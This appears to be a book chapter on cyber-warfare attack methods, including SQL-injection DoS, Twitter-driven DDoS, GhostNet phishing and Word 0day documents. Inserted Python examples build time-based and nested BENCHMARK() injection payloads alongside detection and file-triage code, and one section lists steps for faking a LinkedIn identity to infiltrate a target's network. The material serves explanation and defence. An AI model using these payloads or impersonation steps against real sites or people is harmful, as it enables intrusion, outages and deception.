Chapter 10. Weaponizing Malware

A New Threat Landscape

There are so many emerging threats to computer networks that a detailed overview of them is beyond the scope of this book. Instead, this chapter addresses various modes of attack that have been used in cyber warfare and espionage, as well as a few new innovations that seem particularly perilous to high-value targets such as SCADA systems or classified networks within the defense industry (both government and contractor systems).

StopGeorgia.ru Malware Discussions

A significant portion of the discussion on the StopGeorgia.ru forum was dedicated to traditional distributed denial of service (DDoS) tactics and tools, but the more interesting tactics discussed there focused on abusing application-level vulnerabilities in order to make the backend database execute CPU-intensive SQL functions.

By abusing application-level vulnerabilities (such as SQL injection) to trigger CPU-intensive queries, Georgian information systems could be rendered inoperative using a small number of attacking machines. Whereas a traditional DDoS attack against a robust website can require thousands of bots simultaneously attacking the victim server, exploitation of a SQL injection vulnerability requires only a handful of attacking machines to achieve the same effect.

The discovery and exploitation of these application-level vulnerabilities shows moderate technical sophistication, but more importantly, it shows planning, organization, targeted reconnaissance, and evolution of attacks.

The introduction of SQL injection attacks in conjunction with DoS attacks is alarming for many reasons:

  • SQL injection attacks could indicate that all data stored in the backend databases could have been pilfered or altered. This information could be used as a foundation for further attacks and intelligence gathering against related web applications.

  • Attackers who have pilfered the backend databases via SQL injection could have access to legitimate username and password combinations, allowing them to masquerade as legitimate users, providing a sustained source for intelligence gathering. This is especially alarming for .gov.ge systems, where password reuse or other vulnerabilities could lead to the compromise of other sensitive systems or loss of sensitive information.

  • In some cases, SQL injection attacks can be used to compromise not only information stored in backend databases but the machine hosting the database. This represents a compromise of an organization’s internal infrastructure.

  • Once the underlying system is compromised, it can be used as a stepping stone for further attacks against an organization’s internal network. Considering the poor state of internal network security for most organizations, a moderately sophisticated attacker could use a compromised database server to gain access to a considerable amount of internal information. Once again, this is especially alarming for .gov.ge systems or applications that could have access to other sensitive systems.

  • Finally, a targeted SQL injection attack designed to pilfer data or compromise the underlying system would be extremely difficult to detect while a rigorous, traditional DDoS attack was under way, especially if the attack also included SQL injection designed to cause a DoS condition.

SQL injection, blind SQL injection, and using BENCHMARK

SQL injection is an attack technique that takes advantage of poor secure coding practices. If an application does not correctly validate user-supplied input parameters, an attacker can embed SQL commands within the parameters passed from the web application to the backend database.

The result is that the attacker can execute arbitrary SQL queries and/or commands on the backend database server, using the web application as the delivery mechanism. SQL injection is a critical application issue: it commonly results in the loss of all the data stored within the database and can lead to a compromise of the system housing the database. Additional information on generic SQL injection attacks can be found at http://www.owasp.org/index.php/SQL_injection.

If a hacker discovers a SQL injection vulnerability on a website but the injection does not return any readable data, this is known as “blind” SQL injection. A blind SQL injection vulnerability executes an attacker-controlled SQL query on the backend database with no direct indication as to whether the injected query actually succeeded or failed.

Hackers turned to the BENCHMARK() function (for SQL injection against MySQL databases), which evaluates an expression a specified number of times, to get some indication as to whether their injected SQL query succeeded or failed. By including a Boolean clause (true or false) in the blind SQL injection, the hacker can craft the injection so that if, and only if, the condition is true, the database evaluates the BENCHMARK() expression.

The expressions the hacker hands to BENCHMARK() are CPU-intensive, typically crypto functions such as MD5() or SHA1() run hundreds of thousands of times. Since these BENCHMARK() calls take time to complete, the response is “stalled” until the call finishes. If the hacker launches the blind SQL injection with a CPU-intensive BENCHMARK() and the application stalls for a few seconds before displaying the page, the hacker knows the condition was true and the injection is working. Conversely, if the application displays the page immediately, the hacker knows the condition was false. Because the delay also depends on server load, attackers first measure a baseline response time and compare each probe against it; this is the technique generally called time-based blind SQL injection.

Visit http://www.milw0rm.com/papers/149 for more information about using the BENCHMARK() function for blind SQL injection. It’s interesting to note that the hacker who wrote the tutorial is trying to reduce the CPU load involved with BENCHMARK() usage in order to avoid detection and server-performance issues.

Now, the specific techniques suggested in the StopGeorgia.ru forum were a new twist on typical SQL injection exploitation. Some posters to the forum suggested using BENCHMARK() to consume massive amounts of CPU cycles on the backend database. BENCHMARK() has been a popular technique for blind SQL injection, but using it to intentionally cause a DoS is rare.

The forum suggested that attackers use SQL injection vulnerabilities to make the backend database execute a CPU-intensive task (built-in crypto functions) hundreds of thousands of times. One post suggested nested BENCHMARK() calls, each running 100,000 times: the outer call evaluates the inner call 100,000 times, and each inner call evaluates the crypto function 100,000 times, for 100,000 × 100,000, or 10,000,000,000, evaluations from a single request. Such queries simply consume the CPU of the system hosting the database (often the same machine as the web server).

By using BENCHMARK(), a single web request can cause a significant load on the database server, and in most cases a single attacking machine can render the database server inoperative. Specific SQL injection points were identified on the forums, as well as observed in collected web server logs. SQL injection was undoubtedly used in attacks against Georgian servers.
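The following Python is an added example, not code from this book or from the forum posts it describes. It puts the vulnerable and the parameterized form of a lookup side by side (using an in-memory SQLite table, so it runs offline), builds the two MySQL payload shapes discussed above (a time-based probe and the nested BENCHMARK() DoS variant) without executing them, and runs a simple check over constructed web-server log lines for the timing primitives such payloads rely on. The table contents, the log lines and the `news.php?id=` injection point are all constructed for the example.

```python
"""Added example: vulnerable vs. parameterized lookup, the MySQL BENCHMARK()
payload shapes described in the text, and a log check for timing primitives.
SQLite is used so the lookup part runs stand-alone; the MySQL payload strings
are built but not executed. All sample data is constructed."""
import re
import sqlite3
from urllib.parse import unquote


def make_db():
    """Constructed sample: two users in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)")
    conn.executemany("INSERT INTO users (username, pw_hash) VALUES (?, ?)",
                     [("alice", "5f4dcc3b..."), ("bob", "e10adc39...")])
    return conn


def lookup_vulnerable(conn, username):
    """Input is concatenated into the SQL text, so a quote in it rewrites the query."""
    sql = "SELECT username FROM users WHERE username = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn, username):
    """Same query with a bound parameter: the input can only ever be a value."""
    return [row[0] for row in conn.execute(
        "SELECT username FROM users WHERE username = ?", (username,))]


def time_probe_payload(condition, rounds=5_000_000):
    """Time-based blind probe for a MySQL backend: the BENCHMARK() branch runs
    only when `condition` is true, so a slow response means 'true'. The
    attacker compares the delay against a measured baseline response time."""
    return "' AND IF((%s), BENCHMARK(%d, SHA1('x')), 0) -- " % (condition, rounds)


def nested_benchmark_payload(depth=2, rounds=100_000):
    """DoS variant from the forum: nest BENCHMARK() so one request forces
    rounds**depth SHA1 evaluations (100,000 x 100,000 for depth 2).
    Returns the payload and the number of evaluations it requests."""
    expr = "SHA1('x')"
    for _ in range(depth):
        expr = "BENCHMARK(%d, %s)" % (rounds, expr)
    return "' OR %s -- " % expr, rounds ** depth


# Constructed access-log lines in combined-log format (not real Georgian logs).
LOG_LINES = [
    '10.0.0.5 - - [08/Aug/2008:21:14:02 +0400] "GET /news.php?id=12 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [08/Aug/2008:21:14:09 +0400] "GET /news.php?id=12%27%20AND%20IF((1=1),'
    'BENCHMARK(5000000,SHA1(%27x%27)),0)--%20 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [08/Aug/2008:21:14:11 +0400] "GET /news.php?id=12%27%20OR%20BENCHMARK('
    '100000,BENCHMARK(100000,SHA1(%27x%27)))--%20 HTTP/1.1" 500 0',
    '10.0.0.9 - - [08/Aug/2008:21:14:12 +0400] "GET /index.php HTTP/1.1" 200 2048',
]

# Delay primitives an injected condition can hide behind, across engines.
_TIMING_FUNCS = re.compile(r"\b(?:BENCHMARK|SLEEP|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.I)
_REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) ')


def flag_time_based_sqli(lines):
    """Return (client_ip, decoded_request) for lines carrying a timing primitive.
    Decoding comes first: the payload arrives percent-encoded in the URL."""
    hits = []
    for line in lines:
        m = _REQUEST.match(line)
        if not m:
            continue
        decoded = unquote(m.group(2))
        if _TIMING_FUNCS.search(decoded):
            hits.append((m.group(1), decoded))
    return hits


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, "' OR 1=1 -- "))
    print("hardened:  ", lookup_hardened(db, "' OR 1=1 -- "))
    print(time_probe_payload("SUBSTRING(USER(),1,1)='r'"))
    payload, cost = nested_benchmark_payload()
    print(payload, "->", cost, "SHA1 evaluations")
    for ip, req in flag_time_based_sqli(LOG_LINES):
        print("suspect", ip, req)
```

The log check is deliberately narrow: it matches the function names, not the injection itself, so it will not catch a probe that uses a different delay primitive or that is blind in the data-exfiltration sense only. Its value is after the fact, during the kind of DDoS described above, when a handful of requests that name BENCHMARK() stand out from a flood that does not.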

Note

BENCHMARK() is specific to MySQL, but other popular databases offer ways to introduce a measurable delay for blind injection (MySQL also has SLEEP(), PostgreSQL has pg_sleep(), and Microsoft SQL Server has WAITFOR DELAY); these sleep rather than burn CPU, so they serve the timing oracle but not the DoS. Other specific techniques mentioned in both forums for bringing down or gaining illicit access to machines included:

  • Regularly checking the status of a host through ping -t <host> -i <interval>

  • Using SQL injection through an improperly sanitized query string

  • Brute-force attacks

  • Social engineering to gain passwords

Twitter as DDoS Command Post against Iran

The mid-June 2009 Iranian presidential election, in which Mahmoud Ahmadinejad was declared the winner over rival Mir Hussein Moussavi, was so widely contested that opposition protests, fueled by the Iranian government’s harsh treatment of protesters, overflowed onto the Internet, creating a wave of instant support for the protesters and fury against the Iranian government.

Official Iranian filtering targeted news media of all types, so Iranian dissidents turned to posting photos and videos on Internet sites such as YouTube and various blogging platforms. Protests, when interrupted by Iranian police, turned violent, and within a few days eight fatalities were reported.

The coordinating medium for this outrage was none other than Twitter, the microblogging service that has defied attempts by journalists, politicians, and comedians to categorize it as a tool of the self-absorbed.

In fact, Twitter has proven its value as a real-time reporting service in crisis environments, for example, Mumbai during the November 2008 terrorist attacks. In the Iranian crisis, the Twitter platform was used by Iranians upset with the election results that showed the current President achieving a landslide victory.

Links to automated DDoS tools were circulated, along with recommended target websites. For example, Jose Nazario wrote on his blog Security to the Core:

Here’s a peek at one such script [Figure 10-1], using the “page reboot” site as a basis for the tools. Page reboot uses a very simple method, namely use Javascript to reload the URL in the page repeatedly. The browser will happily do so, just like the user was sitting there hitting F5 in their Internet Explorer. This can cause some stress on the attacker’s specific machine, reveals their IPs through the HTTP connections, and is trivial to filter, but is growing in popularity.


Figure 10-1. IFRAME elements embed a remote page into a local page

In this case someone’s put together a single page of HTML with multiple “IFRAME” elements which embed the remote page into the local page. This is a simple magnifier of the local site’s effect but has the effect of diminishing results: the attacker’s machine slows down for all attacks as it loads them and consumes more bandwidth as it loads all of the pages again and again.

A Norwegian journalist created a “Cyberwar Guide for Beginners” that provides guidance in a number of areas of interest to the global online community who is watching events unfold and wants to do something to help:

The purpose of this guide is to help you participate constructively in the Iranian election protests through twitter:

  1. Do NOT publicise proxy IPs over twitter, and especially not using the #iranelection hashtag. Security forces are monitoring this hashtag, and the moment they identify a proxy IP they will block it in Iran. If you are creating new proxies for the Iranian bloggers, DM them to @stopAhmadi or @iran09 and they will distribute them discreetly to bloggers in Iran.

  2. Hashtags, the only two legitimate hashtags being used by bloggers in Iran are #iranelection and #gr88, other hashtag ideas run the risk of diluting the conversation.

  3. Keep your bull$hit filter up! Security forces are now setting up twitter accounts to spread disinformation by posing as Iranian protesters. Please don’t retweet impetuously; try to confirm information with reliable sources before retweeting. The legitimate sources are not hard to find and follow.

  4. Help cover the bloggers: change your twitter settings so that your location is TEHRAN and your time zone is GMT +3.30. Security forces are hunting for bloggers using location and timezone searches. If we all become ‘Iranians’ it becomes much harder to find them.

  5. Don’t blow their cover! If you discover a genuine source, please don’t publicise their name or location on a website. These bloggers are in REAL danger. Spread the word discretely through your own networks but don’t signpost them to the security forces. People are dying there, for real, please keep that in mind.

  6. Denial of Service attacks. If you don’t know what you are doing, stay out of this game. Only target those sites the legitimate Iranian bloggers are designating. Be aware that these attacks can have detrimental effects to the network the protesters are relying on. Keep monitoring their traffic to note when you should turn the taps on or off.

  7. Do spread the (legitimate) word, it works! When the bloggers asked for twitter maintenance to be postponed using the #nomaintenance tag, it had the desired effect. As long as we spread good information, provide moral support to the protesters, and take our lead from the legitimate bloggers, we can make a constructive contribution.

Please remember that this is about the future of the Iranian people, while it might be exciting to get caught up in the flow of participating in a new meme, do not lose sight of what this is really about.

Unfortunately, by engaging in DDoS attacks, an individual may contribute to the closure of Internet access by the Iranian government, thus shutting off the very life line that the Iranian opposition needs to build the support of the global community.

The Open Net Initiative recently released a detailed report on Internet filtering (i.e., censorship) by the government of Iran. A big part of Tehran’s control derives from all Internet traffic being routed through one bottleneck—the Telecommunications Company of Iran (TCI). Another is the prohibition against private citizens subscribing to high-speed service.

The single greatest takeaway for social media advocates in the Iranian elections is that there is nothing clear cut about the event nor the usefulness of the tool. Individuals’ eagerness to join in the DDoS flood may be putting the very people that they wish to help at risk. Those looking with a noncritical eye to tweets for “real,” as-it-happens information may be reading an Iranian government disinformation post. There is a commensurate increase in risk and reward.

Social Engineering

A group of Canadian researchers recently uncovered a massive Chinese computer espionage ring (GhostNet) involving almost 1,300 infected computers in 103 countries. According to their report, about 30% of the infected hosts were located in government offices, media companies, and nongovernment organizations (NGOs).

The malware used, a type of Trojan known as a remote access tool (RAT), was of Chinese design and named gh0st RAT. Once infected, the attacker gained complete control of the host computer, including the ability to:

  • Activate a web cam and conduct audio and video surveillance

  • Search for and exfiltrate sensitive documents

  • Initiate keylogging to capture usernames and passwords

One of the many interesting lessons derived from the GhostNet investigation is that none of the espionage tools or techniques that were used so successfully was new. It was basically a variant of the old spear phishing scheme, in which an attacker sends a carefully worded email message to an organization or company, with content tailored closely to the recipient.

For example, the email message used to spread the gh0st RAT Trojan contained the following subject line: “Translation of Freedom Movement ID Book for Tibetans in Exile.”

The email message contained the emblem of the Tibetan Government in Exile, and the attached .doc file had the same title as the subject line. When clicked, the file apparently opened normally; however, once opened, a series of unfortunate events followed:

  1. A vulnerability on the user’s machine was exploited and the malware was loaded.

  2. Once installed, the malware attempted to make contact with its control server.

  3. Any operator with access to the control server’s interface could then gain complete control of the infected computer and access to the network to which it belonged.

Anti-virus software frequently did not detect this Trojan. According to the report’s authors, only 11 of 34 anti-virus programs successfully quarantined the infected document; the other 23 simply didn’t catch it.

In 2006, Australia’s CERT announced an 80% miss rate by anti-virus (AV) programs in stopping malware, principally because hackers will test their code against existing AV programs until it escapes detection.

This underscores one of the most important points in understanding any cyber defense strategy: both states and enterprises that must defend sensitive data from malicious access cannot rely solely on technology to protect them. The human element, with all of its strengths and weaknesses, is paramount.

While millions of people of all ages enjoy many of the benefits of being connected to the Web, it also raises their risk for being victimized by an online scam or attack. The more information a cyber criminal knows about his target, the easier it is to create an attractive lure, and the more likely it is that an unsuspecting individual (as demonstrated by the GhostNet investigation) will take the bait.

Social media sites such as Twitter, Facebook, Plaxo, and LinkedIn meet legitimate networking needs among professional adults; however, they are concurrently being tracked, mined, searched, and ranked for marketing purposes by companies such as Nielsen BuzzMetrics, Visible Technologies, and other firms that perform brand-monitoring and name-recognition services for businesses.

Social engineering as a tactic for hackers precedes all of the previously mentioned services by many years. In fact, the “old-school” approach consisted of dumpster diving and other “meat space” techniques used to gather user login and password information from target companies. Thanks to the rapidly growing social media space, those old-school techniques have given way to a completely online approach.

The Government 2.0 movement of 2009 highlights many of the benefits that might accrue with the use of social software by government officials and agencies, including providing a real-time gauge for evaluating public sentiment during key moments of national or international events and policy debate.

The negative aspects relate directly to social engineering hacks. Government employees’ user profiles, not to mention their posts, often contain personal data that a motivated hacker could leverage into an attack similar to the one described in the GhostNet case.

Since there are legitimate uses for this information as well as nefarious ones, specialty Internet search engines are being created that focus on the Social Web. A January 2009 post on the Online Marketing blog (http://www.toprankblog.com/2009/01/6-social-search-engines/) reviewed no less than six new social search engines, three of which were:

WhosTalkin.com

This application searches for keyword topics in conversation threads taking place in over 60 social media portals.

Samepoint.com

This application tracks millions of conversations taking place in tens of thousands of blogs and on social media sites.

OneRiot.com

OneRiot crawls the links people share on Twitter, Digg, and other social sharing services, and then indexes the content on those pages in seconds.

The Social Graph API

Google Labs recently created the Social Graph API, which allows developers to access the connections that people have made via the Web, whether through blogs, Digg, YouTube, LinkedIn, Facebook, Twitter, or other social networks. This has significant intelligence-gathering implications for adversaries looking to target specific groups of people.

The Social Graph API works by searching for pages that belong to you via your membership in one of the many social networks on the Web. In addition to finding your Twitter, Daily Motion, and Flickr home pages (for example), it will also look for links between friends, followers, or even your blog roll.

By now it should be obvious that employees who work in targeted, high-value industries (e.g., government, public utilities, defense contractors) must exercise caution in revealing any personal details, areas of interest, and affiliations. It is simply too easy to build detailed personal profiles from open sources, and it’s getting easier every day.

Channel Consolidation

Jeff Jonas has established a well-deserved reputation for excellence in demonstrating how large organizations can sort through ever-growing mountains of data and make vital connections, whether the purpose is national security or sustaining profitability.

In 2009, Jonas wrote a blog post entitled “Channel Consolidation.” In it, he makes the case that channel consolidation is an essential ingredient to improving accuracy in prediction (for example, when an online travel site makes suggestions based on your past trips).

Jeff points out that channel separation is what we have known all of our lives. Even though our actions are recorded by each credit card purchase and cell phone call, our banker doesn’t know where we were at 11 a.m. yesterday, and our doctor isn’t informed as to the contents of our email inbox.

Channel consolidation, however, is what we are moving toward. As Jonas points out, it is an essential component in making accurate predictions about what you want to read or what movie you want to rent. Consumers like the convenience, and businesses like the efficiency. Law enforcement and intelligence services like it for their own classified reasons.

In his blog post on the subject, Jeff points to Facebook as an example of what channel consolidation might look like:

Facebook makes a great example of channel consolidation. All your emails, instant messages, status updates, past/present/and future travel, annotated photos, your social circle, memberships, self-expressed interests, and more...all bundled together in one nice little package, under your user account. Traditionally such life details are expressed on diverse channels—unobservable to any single entity. No more. Facebook, with this panoramic view of its users, now likely has a substantially more complete picture of a person than almost any other single entity.

How powerful is this? Here is one example: if you are a Facebook user maybe you have noticed the increasingly (spooky smart) relevant ads. I get ads that read “Are you 44, a triathlete, and want abs like this?” Or a well-timed ad over the summer when I was in Southern California that read: “Are you looking for a triathlete coach in the Orange County area?” It is so relevant I find it very hard not to click on the ad! (Be assured I do resist.)

The more sense Facebook makes of users, the better the service, the more folks will find Facebook irreplaceable, the more users will flock to the platform, and last but not least, the more advertisers are willing to pay. Everyone seems the winner.

An Adversary’s Look at LinkedIn

LinkedIn and other social networking sites are essentially trust networks, but with little in the way of authentication. Therefore the obvious question—how reliable is the trust that is extended?—remains a difficult one to answer.

Nitesh Dhanjani, a computer security expert who specializes in the financial sector, believes that the problem will grow worse and that our privacy, reputations, and identities are at stake. (See his book Hacking: The Next Generation (http://oreilly.com/catalog/9780596154585/) [O’Reilly].)

Nitesh points to LinkedIn as an example. Imagine that you are a consultant with a profile at LinkedIn. Your contact list represents intellectual property and you want to protect it from the prying eyes of your competitors. At the same time, it may benefit you to share that property in a way that is mutually beneficial. This requires a way to authenticate the identity of each member, something that doesn’t yet exist on any social networking site, including LinkedIn.

From an adversarial point of view, how would one take advantage of this situation? Since LinkedIn builds its identity-management structure around email addresses, a social engineering hack would probably take advantage of that. Email addresses are easy to spoof, so all one needs to do to access a target contact list is to get the target to connect with a fake LinkedIn account. Here is the process that Nitesh imagined:

  • Think of an individual the target LinkedIn member may know but who doesn’t yet have a LinkedIn account.

  • Create an email address with the name of this individual, such as or . You can go as far as creating a similar looking domain name of the company the individual may work at (for example, @applee.com, @app1e.com, etc.).

  • Create a profile on LinkedIn with the name and email address of the individual.

  • Send an invitation to the target using the new LinkedIn account, and wait for the target to accept.

  • Bonus: other people the target is connected to will notice that he or she has added a new friend (the individual you picked). Should the individual happen to be a mutual friend of these people, they will likely attempt to connect to your new LinkedIn profile, offering you even more details about the target’s network.

Once connected, the circle of trust is established and resources begin to be exchanged, partly facilitated by LinkedIn’s own user interface and partly out of enthusiasm of the members. Since an adversary’s fraudulent profile needs as many connections as he can secure in order to be believable and gain trust, he may very well appear to be the perfect LinkedIn member—outgoing, gregarious, helpful, informative, happy to provide contacts and recommendations, and so on.

As a result, other legitimate members will be happy to nominate or provide recommendations for him, and that could include membership in LinkedIn discussion groups dedicated to discussing issues related to cyber warfare or intelligence or IT security. The list is endless.

A solution to this dilemma is not easy to come by, since social networks rely on members sharing information about themselves, and indeed people love to share information. The beauty of this hack is that it plays on perfectly natural and accepted modes of behavior.

It may be that some individuals employed in critical jobs should be prohibited from joining such networks. At the very least, it wouldn’t hurt for everyone to become a bit more skeptical about their online relationships. At best, a more secure authentication system should be put into place.

BIOS-Based Rootkit Attack

This is a proof-of-concept attack presented by two researchers who work for Core Security Technologies. Although BIOS-based attacks are not new, this one evades anti-virus software and is not removed by rebooting an infected computer, since the malicious code lives in the firmware rather than on disk.

According to its developers, Anibal Sacco and Alfredo Ortega, the infected machine can go on to attack other machines without using its host machine’s memory or hard drive. Furthermore, since it runs before any other code on the system, it can allow an attacker to deactivate the anti-virus software.

Defense against this exploit is difficult at best. Its creators say that the best options are “to prevent the flashing of the BIOS by enabling ‘write’ protection on the motherboard, or deploying digitally signed BIOSes.”

Malware for Hire

In March 2009, a few employees of Applicure, an Israeli network security company, launched a SQL injection attack against the Hezbollah website, temporarily taking it offline.

What made this event unique was how they did it: they used a piece of Chinese-created malware that allows subscribers to hire botnets on a monthly basis, with fees ranging from a little over $20 a month for a very small network of 10 bots to $100 a month to control 1,000 bots.

According to an article on Haaretz.com, this application, a kind of malware-as-a-service, offers a user-friendly interface that allows the operator to choose the type of attack, attack speed, and number of computers (bots).

Anti-Virus Software Cannot Protect You

Most anti-virus software is primarily signature-based, meaning that it relies on security companies such as McAfee, Symantec, and Kaspersky to create a unique signature (a hash or byte pattern) for each piece of malware that is discovered. In 2008, there were so many viruses being created that Symantec needed to write a new signature every 20 seconds. In 2009, that dropped to every 8 seconds.

As of this writing, Triumfant’s Worldwide Malware Signature Counter is displaying 3,704,642 malware signatures needed by AV software to be up to date. As I typed the period of that last sentence, that number increased by 5.

The counter can be found at http://www.triumfant.com/Signature_Counter.asp. As I write this second edition, the count has increased by almost 400% to 13,930,460.

Simply put, security software vendors cannot keep up with this pace. More importantly, updates cannot reach customer computers fast enough to ensure protection. Finally, it’s important to remember that no signature-based anti-virus software can protect you from a zero-day exploit, i.e., malware so new that no AV signature has been created for it.

This makes it necessary for Computer Network Defense operations to become a priority in any cyber warfare strategy. It also requires the acceptance of a harsh reality, namely that the NSA and DHS (the two agencies responsible for military and civilian cyber network security, respectively) cannot possibly protect every department and every enterprise. Instead, these agencies must determine the high-priority targets in both arenas and focus on hardening those systems, while requiring 24/7 monitoring of individual networks.

Targeted Attacks Against Military Brass and Government Executives

Attacks against military brass and government executives make for great news stories. Media outlets often will report that “machines have been compromised” and “data has been stolen” but provide few details as to how the attacks were carried out. This section discusses the means by which targeted attacks are executed. The attack described here is based on actual attacks that have occurred. Several technical details have been changed, but the major characteristics of the attacks are intact.

Research is the key to offensive capabilities

Sophisticated, targeted attacks begin with research. A tremendous amount of time, money, and human brain power is dedicated to finding new vulnerabilities in widely used software such as Microsoft Word, Internet Explorer, Mozilla Firefox, and even the most widely used operating system in the world, Microsoft Windows. When a new vulnerability is discovered, the discovering organization gains an advantage: it has a weapon that has no specific defense, and the defender has zero knowledge that the exploit exists. These vulnerabilities are known as “0day” (pronounced “zero day” or sometimes “oh-day”) vulnerabilities, and they are the “tip of the spear” in the offensive cyber world. Attacks built on them cause a tremendous amount of damage, and the victim seldom realizes they have been compromised. DDoS attacks gain a lot of media attention because they are noisy and easy to detect, but targeted 0day attacks with custom payloads are silent, almost impossible to detect reliably, and represent the most powerful attack available to offensive cyber units. It is these attacks that represent the true capability of an offensive cyber unit.

In this example, the attacking organization has found a vulnerability in the word-processing software Microsoft Word. Word is widely used within the US government, and the attacker knows that. For the sake of clarity, the specific technical details of the exploit will not be covered; instead, this section covers the major points of the vulnerability.

First, it is important to understand that prior to Microsoft Office 2007, all Office documents were stored in a binary file format (the OLE2 Compound File format, whose files begin with the signature bytes D0 CF 11 E0 A1 B1 1A E1).

Note

More information about binary file formats can be found on Wikipedia at http://en.wikipedia.org/wiki/Binary_file.

Programs like Microsoft Word that consume binary file formats have a reputation for being difficult to secure and have been known to be affected by vulnerabilities that corrupt the memory of the program parsing the file. If an attacker can corrupt memory in a controlled manner and redirect execution into attacker-supplied machine code (known as “shellcode”), the attacker gains access to the target system with the privileges of the user who opened the document.

The exploit, along with the attacker’s shellcode, is hidden deep inside the raw binary contents of the malicious Word document. The binary structure of the Word document makes it impossible for the average user to determine whether it contains malicious code. For example, Figure 10-2 shows a typical Word document as displayed by Microsoft Word.

Figure 10-2. Microsoft Word document as viewed in Microsoft Word

Opening the same document in a hex editor shows the raw contents of the file, which look nothing like what the user sees within Microsoft Word. The average user will not be able to comprehend the binary structure of the Word file, let alone detect malicious content within it. It is within this raw binary data that the attacker places his exploit and shellcode. A portion of the raw binary contents is shown in Figure 10-3. Would you be able to spot an exploit in the binary data?

Figure 10-3. Raw data content from a Microsoft Word document
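The hex dump in Figure 10-3 is exactly what an analyst starts from, so the following added example (not code from the book) shows how a first-pass triage of a pre-2007 Office file works: it checks the container magic (the OLE2 Compound File signature D0 CF 11 E0 A1 B1 1A E1 for .doc/.xls/.ppt, versus PK 03 04 for the later ZIP-based Office Open XML format), parses the fields of the compound-file header that a corrupted document commonly abuses, prints a hex dump in the style of the figure, and scans the raw sectors for two crude indicators that an exploit writer may leave behind: a run of 0x90 NOP bytes (a sled in front of shellcode) and an embedded Windows PE executable. The sample document is constructed inline; it is not a real exploit. The indicator scan is deliberately naive: a real 0day need contain neither a NOP sled nor a dropped executable, which is the point the text makes about 0day detection.

```python
"""Triage a binary Office document: identify the container, parse the
compound-file header, hex-dump it and scan for crude exploit indicators.
Added example; SAMPLE_DOC is constructed and is not a real exploit."""
import struct

CFB_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"  # OLE2 Compound File (.doc/.xls/.ppt)
OOXML_MAGIC = b"PK\x03\x04"                      # Office Open XML is a ZIP archive
PE_MAGIC = b"MZ"                                 # DOS stub of a Windows executable


def identify_container(data):
    """Classify by leading magic bytes, the way MOICE and mail filters must."""
    if data.startswith(CFB_MAGIC):
        return "cfb"
    if data.startswith(OOXML_MAGIC):
        return "ooxml"
    return "unknown"


def parse_cfb_header(data):
    """Parse the MS-CFB header fields that parsers trust and exploits corrupt."""
    if not data.startswith(CFB_MAGIC) or len(data) < 512:
        raise ValueError("not a compound file")
    minor, major, byte_order, sector_shift, mini_shift = struct.unpack_from("<HHHHH", data, 24)
    if byte_order != 0xFFFE:
        raise ValueError("bad byte-order marker")
    num_fat, first_dir = struct.unpack_from("<II", data, 44)
    return {
        "major_version": major,
        "sector_size": 1 << sector_shift,        # 9 -> 512 bytes, 12 -> 4096 bytes
        "mini_sector_size": 1 << mini_shift,
        "num_fat_sectors": num_fat,
        "first_dir_sector": first_dir,
    }


def hexdump(data, offset=0, length=64, width=16):
    """Render bytes as a hex editor would (compare Figure 10-3)."""
    lines = []
    for i in range(offset, min(offset + length, len(data)), width):
        chunk = data[i:i + width]
        hexpart = " ".join(f"{b:02x}" for b in chunk)
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{i:08x}  {hexpart:<{width * 3}} |{asc}|")
    return "\n".join(lines)


def find_nop_sleds(data, min_len=32):
    """Return (offset, length) of every run of 0x90 bytes at least min_len long."""
    runs, i, n = [], 0, len(data)
    while i < n:
        if data[i] == 0x90:
            j = i
            while j < n and data[j] == 0x90:
                j += 1
            if j - i >= min_len:
                runs.append((i, j - i))
            i = j
        else:
            i += 1
    return runs


def find_embedded_pe(data):
    """Return offsets of 'MZ' headers whose e_lfanew really points at 'PE\\0\\0'."""
    hits, pos = [], data.find(PE_MAGIC)
    while pos != -1:
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            if 0x40 <= e_lfanew < 0x1000 and data[pos + e_lfanew:pos + e_lfanew + 4] == b"PE\0\0":
                hits.append(pos)
        pos = data.find(PE_MAGIC, pos + 1)
    return hits


def triage(data):
    report = {"container": identify_container(data), "size": len(data)}
    if report["container"] == "cfb":
        report["header"] = parse_cfb_header(data)
    report["nop_sleds"] = find_nop_sleds(data)
    report["embedded_pe"] = find_embedded_pe(data)
    report["suspicious"] = bool(report["nop_sleds"] or report["embedded_pe"])
    return report


def build_sample_doc():
    """Constructed sample: valid CFB header, one FAT sector, then a sector hiding
    a 64-byte NOP sled and a bogus PE stub. Not loadable by Word; illustration only."""
    hdr = bytearray(512)
    hdr[0:8] = CFB_MAGIC
    struct.pack_into("<HHHHH", hdr, 24, 0x003E, 0x0003, 0xFFFE, 9, 6)  # v3, 512-byte sectors
    struct.pack_into("<II", hdr, 44, 1, 1)      # one FAT sector; directory at sector 1
    struct.pack_into("<I", hdr, 76, 0)          # DIFAT[0]: the FAT lives in sector 0
    for i in range(1, 109):
        struct.pack_into("<I", hdr, 76 + 4 * i, 0xFFFFFFFF)  # remaining DIFAT entries free
    fat = bytearray(b"\xFF" * 512)
    struct.pack_into("<II", fat, 0, 0xFFFFFFFD, 0xFFFFFFFE)  # FATSECT, ENDOFCHAIN
    stub = bytearray(0x44)
    stub[0:2] = PE_MAGIC
    struct.pack_into("<I", stub, 0x3C, 0x40)    # e_lfanew -> "PE\0\0"
    stub[0x40:0x44] = b"PE\0\0"
    payload = (b"\x90" * 64 + bytes(stub)).ljust(512, b"\x00")
    return bytes(hdr + fat) + payload


SAMPLE_DOC = build_sample_doc()

if __name__ == "__main__":
    print(hexdump(SAMPLE_DOC, 0, 64))
    print(triage(SAMPLE_DOC))
```

Running the block prints the header as a hex editor would and a report flagging the 64-byte sled at offset 1024 and the executable stub at offset 1088. Against a genuine targeted document the same scan will usually come back clean, which is why the defenses discussed later in this chapter matter more than signatures.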

Sophisticated organizations with robust offensive cyber capabilities will stockpile these 0day vulnerabilities, ensuring they have the cyber firepower to take advantage of targets of opportunity.

